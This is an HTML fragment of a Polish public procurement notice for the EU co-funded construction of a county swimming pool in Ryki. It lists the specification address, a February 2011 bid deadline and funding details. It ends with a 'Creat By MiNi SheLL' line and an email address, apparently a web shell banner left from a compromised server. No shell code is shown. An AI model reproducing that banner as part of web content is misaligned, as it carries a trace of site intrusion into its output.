<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatryki.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Rykach, ul. Wyczółkowskiego 10A, 08-500 Ryki, pokój Nr 214 -  piętro II.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2011 godzina 12:00, miejsce: Starostwo Powiatowe w Rykach, ul. Wyczółkowskiego 10A, 08-500 Ryki, pokój Nr 103 -  piętro l.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Osi priorytetowej VIII Infrastruktura społeczna Działania 8.2. Infrastruktura szkolna i sportowa Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 - umowa nr:13/09-UDA-RPLU.08.02.00-06-110/09-00-0489 o dofinansowanie projektu: Budowa pływalni powiatowej w Rykach..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com